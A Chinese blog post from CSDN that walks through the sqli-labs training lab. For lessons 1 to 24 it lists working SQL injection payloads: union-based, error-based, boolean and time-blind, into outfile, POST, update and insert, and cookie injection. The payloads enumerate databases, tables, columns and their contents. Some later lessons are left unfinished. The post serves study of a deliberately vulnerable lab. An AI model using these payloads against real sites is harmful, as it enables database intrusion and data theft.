sqli labs通关秘籍

最新推荐文章于 2024-03-19 20:01:13 发布
最新推荐文章于 2024-03-19 20:01:13 发布
阅读量1.8k 收藏 8
点赞数
分类专栏: Web安全 文章标签: sqli-labs sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_25449961/article/details/51697742
版权

lesson 1

查看列数
id=1' order by 3
id=1' union select 1,2,3 --+

利用information_schema查询所有数据库名
?id=-1' union select 1,2,group_concat(distinct+table_schema) from information_schema.tables --+

根据数据库名查找表名
?id=-1' union select 1,2,table_name from information_schema.tables where table_schema = 'security' limit 1,1--+

根据表名查找列名
?id=-1' union select 1,2,column_name from information_schema.columns where table_schema='security'
and table_name='referers' limit 0,1--+

根据列名查询数据
?id=-1' union select 1,2,id from emails limit 4,1 --+
或者其他数据库中的数据,如test数据库qwe表:
?id=-1' union select 1,2,id from test.qwe limit 0,1 --+

lesson 2

提示为数字型

查看列数
?id=1 order by 3 --+
?id=1 union select 1,2,3 --+

查询所有数据库名
?id=-1 union select 1,2,group_concat(distinct+table_schema) from information_schema.tables --+

查询表名
?id=-1 union select 1,2,table_name from information_schema.tables where table_schema = 'security' limit 1,1--+

查询列名
?id=-1 union select 1,2,column_name from information_schema.columns where table_schema='security' limit 1,1 --+

查询数据
?id=-1 union select 1,2,id from emails limit 4,1 --+
或者其他数据库中的数据,如test数据库qwe表:
?id=-1 union select 1,2,id from test.qwe limit 0,1 --+

lesson 3

查看列数
?id=-1') union select 1,2,3 --+
?id=1') order by 3 --+

查看所有数据库名
?id=-1') union select 1,2,group_concat(distinct+table_schema) from information_schema.tables --+

根据数据库名查找表名
?id=-1') union select 1,2,table_name from information_schema.tables where table_schema = 'security' limit 1,1--+

根据表名查找列名
?id=-1') union select 1,2,column_name from information_schema.columns where table_schema='security'
and table_name='referers' limit 0,1--+

根据列名查询数据
?id=-1') union select 1,2,id from emails limit 4,1 --+
或者其他数据库中的数据,如test数据库qwe表:
?id=-1') union select 1,2,id from test.qwe limit 0,1 --+

lesson 4

查看列数
?id=-1") union select 1,2,3 --+
?id=1") order by 3 --+

查看所有数据库名
?id=-1") union select 1,2,group_concat(distinct+table_schema) from information_schema.tables --+

根据数据库名查找表名
?id=-1") union select 1,2,table_name from information_schema.tables where table_schema = 'security' limit 1,1--+

根据表名查找列名
?id=-1") union select 1,2,column_name from information_schema.columns where table_schema='security'
and table_name='referers' limit 0,1--+

根据列名查询数据
?id=-1") union select 1,2,id from emails limit 4,1 --+
或者其他数据库中的数据,如test数据库qwe表:
?id=-1") union select 1,2,id from test.qwe limit 0,1 --+

lesson 5

此题为基于报错的注入

注入之前的知识演练
select database();
select (select database());
select concat((select database()));
select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
select concat(0x3a,0x3a,(select database()),0x3a,0x3a)as a;或者
select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema = database() limit 1,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a

取数据库名:
?id=1' union select 1,count(*),concat(0x3a,(select distinct+table_schema limit 0,1),0x3a,floor(rand()*2))a from information_schema.tables group by a -- a

取表名:
?id=1' union select 1,count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema = 'security' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a -- a

取字段:
?id=1' union select 1,count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a -- a

取数据:
?id=1' union select 1,count(*),concat(0x3a,0x3a,(select id from emails limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a -- a
或者其他数据库(例如test数据库qwe表)的数据
?id=1' union select 1,count(*),concat(0x3a,0x3a,(select id from test.qwe limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a -- a

lesson 6

取数据库名:
?id=1" union select 1,count(*),concat(0x3a,(select distinct+table_schema limit 0,1),0x3a,floor(rand()*2))a from information_schema.tables group by a -- a

取表名:
?id=1" union select 1,count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema = 'security' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a -- a

取字段:
?id=1" union select 1,count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a -- a

取数据:
?id=1" union select 1,count(*),concat(0x3a,0x3a,(select id from emails limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a -- a
或者其他数据库(例如test数据库qwe表)的数据
?id=1" union select 1,count(*),concat(0x3a,0x3a,(select id from test.qwe limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a -- a

lesson 7 Dump into outfile

select * from users into outfile "E://newtest.txt";

取数据库名:
select database() into outfile "E://database.txt";
取表名:
select table_name from information_schema.tables where table_schema = database() into outfile "E://biaoming.txt";
取字段名:
select column_name from information_schema.columns where table_schema = database() and table_name = 'emails' into outfile "E://ziduanming.txt";
取值:
select id from emails into outfile "E://zhi.txt";

BLIND INJECTIONS - BOOLEAN BASED less8

select database();
select length(database());
select substring(database(),1,1);
取数据库:
select 1 and (select substring(database(),1,1))='s';
取表名:
select 1 and (select substring((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1))='e';
取字段名:
select 1 and (select substring((select column_name from information_schema.columns where table_schema='数据库名' and table_name='表名' limit 0,1),1,1))='e'
取值:
select 1 and (select substring((select id from emails limit 0,1),1,1))='s';

BLIND INJECTIONS - TIME BASED less 9

sleep()函数
select sleep(10);
if()函数
select if((select database())="security",sleep(3),null);
取数据库名:
select 1 union select if((select substring(database(),1,1))='s',sleep(3),null);
取表名:
select 1 union select if((select substring((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))='s',sleep(3),null);
取字段:
select 1 union select if((select substring((select column_name from information_schema.columns where table_schema = database() and table_name = 'emails' limit 0,1),1,1))='i',sleep(3),null);
取值:
select 1 union select if((select substring((select id from emails limit 0,1),1,1))='1',sleep(3),null);

Post parameter injection less 12

了解:
select * from users where id>10 and 1=1;和
select * from users where id >10 or 1=1;的区别.
输入:
") OR 1=1 -- a
") OR 1=1 limit 0,1 -- a
") order by 2 -- a
取数据库名:
") union select 1,database() -- a
取表名:
") union select 1,table_name from information_schema.tables where table_schema = database() limit 0,1 -- a

less 14 POST parameter injection Double Query based

” or 1 #

select concat((select database()));
select concat('~',(select database()),'~',floor(rand(0)*2));
select concat('~',(select database()),'~',floor(rand(0)*2)) from information_schema.tables;
select (concat('~',(select database()),'~',floor(rand(0)*2)))a from information_schema.tables;
取数据库名:
select count(*),(concat('::',(select database()),'::',floor(rand(0)*2)))a from information_schema.tables group by a;
select 1 from (select count(*),(concat('~',(select database()),'~',floor(rand(0)*2)))a from information_schema.tables group by a)c;
取表名:
select 1 from (select count(*),(concat('~',(select database()),'~',floor(rand(0)*2)))a from information_schema.tables group by a)c;
取字段:
取值:

lession 17 update inject

update users set password='zhangzhengyi' where username='admin';
update users set password=' ' or 1=1 # where username='admin';
' and (select 1 from (select count(*),(concat('~',(select database()),'~',floor(rand(0)*2)))a from information_schema.tables group by a)c) #
取数据库名:
update test set 字段名='aa' where 字段名='bb' and (select 1 from (select count(*),(concat('~',(select database()),'~',floor(rand(0)*2)))a from information_schema.tables group by a)c);

less 18 insert sql inject

insert into users(username,password) values('shenmegui','dahaoren');
通过修改http表头信息,重新构建sql语句,达到注入的目的.

修改cookie值进行sql注入
admin' or 1=1#
admin' order by 4 #
admin' order by 3 #
admin' union select 1,2,3 #
' union select 1,2,3 #
' union select 1,database(),version() #

less 21 加密的cookie注入

base64解码
') union select 1.database(),current_user #

second order injections less 24

CN_CodeLab
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
sqli-labs训练平台靶场详解!!!!
最新发布
ytdd66的博客
03-19 1493
下面选取几个具有代表性的卡,演示几种 SQL 注入漏洞利用方法。
sqli-labs通关详解
m0_52051132的博客
10-15 6578
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqli-labs详解------持续更新
yuqie的博客
06-20 1974
如今已经很少使用手动注入了,写这篇的初心在于掌握并熟记手动注入,
SQL注入sqli-labs
m0_60716947的博客
04-08 7083
目录 (一)搭建 sqli-labs 靶场 (二)sqli-labs的第一至第四笔记 (1)第一 sqli-labs 是一款基于 sql 注入的游戏教程,有利于更好地了解 sql 注入的语法。 (一)搭建 sqli-labs 靶场 搭建 sqli-labs 靶场前首先要下载 phpstudy phpstudy下载链接:https://www.xp.cn 要保证安装路径中不能有空格和中文。 下载完成后: 可以对 root 数据库进行修改密码或创建数据库,然后在软件管理..
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqlilabs过手册注入天书
08-17
sqlilabs过手册注入天书
sqlilabs过手册注入天书.pdf
09-14
sqlilabs过手册注入天书.pdf
sqlilabs,里边赠送包含了,sqlilabs过手册-注入天书,联系sql注入的绝佳靶场
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php,Tomcat+mysql+java(部分卡需要) Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改...
sqlilabs.rar
07-04
sql-lab新版靶场,可以自己搭在虚拟机上练习sql注入
Sqli-lab教程-史上最全详解(1-22通关
qq_52364123的博客
04-10 7485
sql注入集合
Sqli-labs环境搭建教程(sql注入
Victor1889的博客
01-06 8604
Sqli-labs环境搭建教程(sql注入
sqli-labs靶场安装
剁椒鱼头没剁椒的博客
10-22 6297
PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。Sqlilabs是一个学习sql注入的平台,GET和POST场景包括了许多基本的实验内容,例如:基于错误的注入、盲注、更新查询注入、插入查询注入、Header注入、二次注入、Bypass WAF、堆叠注入等等。
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6395
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
【详细】 Sqli-labs1~65 通关详解 解题思路+解题步骤+解析
Jay17的博客
08-03 2万+
【详细】 Sqli-labs1~65 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2068
sqli-labs靶场之前建议补一下基础。
SQL注入Sqli-labs注入环境搭建》
weixin_47118413的博客
04-06 8170
本文章讲解如何通过Linux(Centos 7)和Windows部署Sqli-labs环境进行sql注入漏洞相练习,后期会更新卡教程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值